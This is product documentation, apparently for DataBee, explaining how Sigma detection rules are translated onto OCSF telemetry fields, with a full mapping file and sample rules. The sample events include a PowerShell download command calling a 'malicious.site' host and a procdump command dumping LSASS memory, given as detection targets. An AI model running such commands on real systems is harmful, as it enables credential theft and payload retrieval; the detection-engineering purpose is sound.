Sigma detection enables detection rules written in Sigma format to work effectively on telemetry data formatted in OCSF (Open Cybersecurity Schema Framework). Sigma detection bridges the gap by dynamically translating Sigma-defined fields into OCSF-compatible structures, so rules can run on normalized data across multiple sources.
How Sigma Detection Translates Sigma Rules
Field Matching
Sigma detections maintains a mapping file that connects Sigma fields to likely OCSF fields.
Example:
Sigma field: CommandLine
Matched OCSF field: cmd_line
You don’t need to write these mappings yourself — Sigma detections already knows which Sigma fields to look for.
Schema-Aware Path Matching
Sigma detections use the OCSF schema to find all possible paths where a field like cmd_line might appear at the end.
These can include:
actor.process.cmd_line
assessment.assessor.process.cmd_line
evidences[].actor.process.cmd_line
This ensures your Sigma rule will match regardless of where the data is nested in an OCSF event.
Real-Time Event Evaluation
When an event arrives:
Sigma detections load all known OCSF paths mapped to the Sigma field from its internal mapping.
Each Sigma field can have multiple possible OCSF paths. These are maintained as a list of valid paths for evaluation.
The system traverses the incoming event structure to search for any of these paths.
If any one of the paths exists and contains a valid value, that value is evaluated against the Sigma rule condition.
If the condition is satisfied for any matching path, Sigma detection generates a finding for that rule.
Example:
Sigma Rule:
detection:
selection:
CommandLine|endswith: '.exe'
condition: selectionOCSF Event:
{
"actor": {
"process": {
"cmd_line": "powershell.exe"
}
}
}Result: Match — because cmd_line ends with .exe.
Log sources Field Behavior
When writing Sigma rules, it’s common to include a logsource field to restrict detections to specific types of logs. In DataBee, the logsource field is not currently enforced, meaning all rules are evaluated against all incoming events regardless of the logsource definition.
However, it is recommended to include it in your rules for consistency and forward compatibility, as support for restricting detections based on logsource may be added in the future.
Field Mapping Reference
For full visibility into how Sigma fields are translated to OCSF field paths in DataBee, we have included the entire mapping file used by the detection engine. You can find the complete mapping here.
{ "TargetFilename": [ "file.path", "file.name" ], "Image": [ "image.path", "process.file.path" ], "CommandLine": [ "cmd_line" ], "ParentImage": [ "actor.process.file.path", "actor.process.parent_process.file.path", "process.parent_process.file.path", "logon_process.parent_process.file.path" ], "Signature": [ "file.signature.certificate.issuer" ], "Filename": [ "file.name" ], "c-uri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", "vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "cs-host": [ "url.hostname" ], "c-useragent": [ "http_request.user_agent" ], "cs-method": [ "http_request.http_method" ], "sc-status": [ "http_status" ], "dst_ip": [ "dst_endpoint.ip" ], "cs-cookie": [ "http_cookies[].value", "identifier_cookie" ], "cs-uri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", "vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "c-uri-query": [ "url.query_string" ], "cs-uri-query": [ "url.query_string" ], "cs-user-agent": [ "http_request.user_agent" ], "src_ip": [ "src_endpoint.ip" ], "dst_port": [ "dst_endpoint.port" ], "action": [ "activity_id" ], "path": [ "path" ], "query": [ "url.query_string" ], "qtype_name": [ "query.type", "query.opcode_id" ], "answers": [ "answers", "answers[].rdata" ], "status_code": [ "status_code" ], "uri": [ "url" ], "client_header_names": [ "http_headers[].name" ], "name": [ "device.name" ], "request_type": [ "http_request.http_method" ], "cipher": [ "cipher.cipher" ], "resp_mime_types": [ "http_response.content_type" ], "user_agent": [ "http_request.user_agent" ], "endpoint": [ "src_endpoint.name", "dst_endpoint.name" ], "certificate.serial": [ "certificate.serial_number" ], "answer": [ "answers" ], "destination.port": [ "dst_endpoint.port" ], "event.category": [ "category_name" ], "host.scan.vuln_name": [ "vulnerabilities[].title" ], "type": [ "device.type", "finding.types_" ], "Imphash": [ "fingerprints[].value", "fingerprint.value", "digest.value", "hash.value", "hashes[].value", "ja3_hash.value", "ja3s_hash.value" ], "operation": [ "operation" ], "syscall": [ "kernel.system_call" ], "cwd": [ "command" ], "comm": [ "process.name" ], "ParentCommandLine": [ "cmd_line" ], "User": [ "user.name", "user.id" ], "LogonId": [ "actor.session.uid" ], "CurrentDirectory": [ "process.file.parent_folder" ], "USER": [ "user.name", "user.id" ], "DestinationHostname": [ "dst_endpoint.hostname" ], "DestinationIp": [ "dst_endpoint.ip" ], "riskEventType": [ "metadata.event_code" ], "Category": [ "category_name" ], "Status": [ "status" ], "FileName": [ "file.name" ], "ActivityType": [ "activity_name" ], "properties.message": [ "message" ], "failure_status_reason": [ "status_detail" ], "TargetResources": [ "resources" ], "AuthenticationRequirement": [ "requirements" ], "DeviceDetail.deviceId": [ "device.uid" ], "DeviceDetail.trusttype": [ "device.is_trusted" ], "RiskState": [ "device.risk_level", "risk_level" ], "Count": [ "count" ], "userAgent": [ "http_request.user_agent" ], "DeviceDetail.isCompliant": [ "device.is_compliant" ], "ClientApp": [ "app.name" ], "Username": [ "user.name" ], "ResourceDisplayName": [ "resources[].name", "resource.name" ], "AppId": [ "app.uid" ], "eventName": [ "metadata.log_name" ], "status": [ "status" ], "CategoryValue": [ "category_uid" ], "ResourceId": [ "resources[].uid" ], "Operation": [ "operation" ], "event_type_id": [ "type_uid" ], "debugContext.debugData.requestUri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", "vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "displaymessage": [ "message" ], "actor.alternateid": [ "actor.user.uid_alt" ], "outcome.result": [ "status_detail" ], "userIdentity.arn": [ "user.uid" ], "errorMessage": [ "error_message" ], "errorCode": [ "code" ], "requestParameters": [ "http_request.args" ], "userIdentity.type": [ "user.type" ], "userIdentity.sessionContext.sessionIssuer.type": [ "session.issuer" ], "requestParameters.containerDefinitions.command": [ "process.cmd_line", "job.cmd_line" ], "eventType": [ "finding.types_" ], "EventID": [ "metadata.uid" ], "InterfaceUuid": [ "device.interface_uid" ], "OpNum": [ "opnum" ], "Type": [ "type" ], "SourceFilename": [ "file.name" ], "CreationUtcTime": [ "created_time" ], "Destination": [ "dst_endpoint" ], "Data": [ "data" ], "ScriptBlockText": [ "cmd_line" ], "Path": [ "path" ], "TargetImage": [ "image.path" ], "SourceImage": [ "image.name", "process.file.path" ], "SourceUser": [ "user" ], "Provider_Name": [ "actor.idp.name" ], "Description": [ "message", "process.file.desc", "device.desc" ], "OriginalFileName": [ "file.path", "file.name" ], "Hashes": [ "file.hashes" ], "Device": [ "device" ], "TargetObject": [ "resource.name" ], "Details": [ "details" ], "StartFunction": [ "module.function_name" ], "StartAddress": [ "module.start_address" ], "TargetParentProcessId": [ "process.parent_process.pid" ], "IntegrityLevel": [ "process.integrity" ], "Product": [ "metadata.product.name" ], "md5": [ "file.md5" ], "sha1": [ "file.sha1" ], "sha256": [ "file.sha256" ], "Company": [ "company_name" ], "FileVersion": [ "file.version" ], "State": [ "state" ], "ApplicationPath": [ "app.path" ], "Action": [ "activity_id" ], "UserName": [ "device.owner.full_name" ], "subjectName": [ "certificate.subject", "email.subject" ], "SamAccountName": [ "account.name" ], "TargetUserName": [ "user.name" ], "TargetSid": [ "device.uid" ], "SubjectUserName": [ "user.name" ], "AccessMask": [ "access_mask" ], "AccessList": [ "access_list" ], "ServiceName": [ "service.name" ], "ServiceFileName": [ "file.name", "file.path" ], "LogonType": [ "logon_type" ], "ProcessName": [ "process.name", "logon_process.name" ], "service": [ "service" ], "SubjectUserSid": [ "user.uid" ], "SubjectDomainName": [ "user.domain", "device.domain", "network_endpoint.domain", "network_proxy.domain" ], "AuditPolicyChanges": [ "policy.uid" ], "PrivilegeList": [ "groups.privileges", "privileges" ], "Service": [ "service" ], "AttributeValue": [ "attributes" ], "DestPort": [ "dst_endpoint.port" ], "ClientProcessId": [ "process.pid", "logon_process.pid" ], "ParentProcessId": [ "process.parent_process.pid", "logon_process.parent_process.pid" ], "FailureCode": [ "error" ], "ClassName": [ "class_name" ], "DeviceDescription": [ "device.desc" ], "SourcePort": [ "src_endpoint.port" ], "DestAddress": [ "dst_endpoint.ip" ], "Application": [ "app" ], "IpAddress": [ "device.ip" ], "TargetOutboundUserName": [ "user.name" ], "TargetUserSid": [ "user.uid" ], "Provider": [ "provider" ], "Query": [ "url.query_string" ], "processPath": [ "process.lineage", "logon_process.lineage" ], "process": [ "process.name", "logon_process.name" ], "ProcessPath": [ "actor.file.process.path" ], "ImageName": [ "device.image.name", "process.file.name" ], "Name": [ "name" ], "AppID": [ "app.uid" ], "ImagePath": [ "image.path" ], "AccountName": [ "account.name" ], "ProcessId": [ "logon_process.pid", "process.pid" ], "Caption": [ "caption" ], "Value": [ "enrichments[].value", "server_hassh.fingerprint.value", "client_hassh.fingerprint.value", "http_cookies[].value", "http_headers[].value", "metrics[].value", "observables[].value" ], "SourceName": [ "src_endpoint.name" ], "Feature_Name": [ "app.feature.name" ], "AppName": [ "app.name" ], "Message": [ "http_request.message", "http_response.message" ], "ErrorCode": [ "http_request.code", "http_response.code" ], "RequestedPolicy": [ "authorizations[].policy" ], "Protocol": [ "auth_protocol", "connection_info.protocol_name" ], "DestinationPort": [ "dst_endpoint.port" ], "DestinationIsIpv6": [ "dst_endpoint.ip" ], "SourceIp": [ "src_endpoint.ip" ], "SourceHostname": [ "src_endpoint.hostname" ], "Hash": [ "hash" ], "DeviceName": [ "device.name" ], "AuditSourceName": [ "resource.name" ] }
Sigma Rules Directly Using OCSF Fields
Sigma detection supports traditional Sigma rules using generic field names (which are internally translated to OCSF fields), users can also write Sigma rules directly using OCSF field paths. This approach can help reduce false positives by being more precise and avoiding unnecessary broad field matching.
How to Write an OCSF-Native Sigma Rule
You can reference specific OCSF field paths in the detection section of your Sigma rule using dot notation, as shown in the example below.
Examples:
Example 1
Sigma Rule:
... detection: selection: actor.process.file.name: 'WINWORD.EXE' condition: selection ...Event:
{ "actor": { "process": { "file": { "name": "WINWORD.EXE" } } } }This rule matches the event because the value at the specified OCSF path actor.process.file.name is exactly 'WINWORD.EXE', which satisfies the condition defined in the Sigma rule.
Example 2
Sigma Rule:
... detection: selection: actor.process.file.name: 'powershell.exe' actor.process.command_line|contains: 'Invoke-WebRequest' condition: selection ...Event:
{ "actor": { "process": { "file": { "name": "powershell.exe" }, "command_line": "powershell.exe -nop -c Invoke-WebRequest http://malicious.site" } } }The rule looks for powershell.exe being executed with a command that includes Invoke-WebRequest, indicating potential malicious behavior.
Example 3
Sigma Rule:
... detection: selection1: actor.process.file.name: 'lsass.exe' selection2: actor.process.parent.file.name: 'procdump.exe' selection3: actor.process.command_line|contains: '-ma' condition: selection1 and selection2 and selection3 ...Event:
{ "actor": { "process": { "file": { "name": "lsass.exe" }, "parent": { "file": { "name": "procdump.exe" } }, "command_line": "procdump.exe -ma lsass.exe C:\\dump.dmp" } } }This rule combines multiple conditions across different parts of the event structure. All must be true for a match.
Key Takeaways
Write Sigma rules using Sigma field names (like CommandLine) — no need to reference OCSF paths.
Sigma detections automatically map and traverse OCSF events for you.
Your rule logic is applied to all valid paths, ensuring broader and more accurate detection.
Tip
If you’re unsure whether a specific Sigma field is supported:
Contact the Analytics team.
Or request new field support as needed.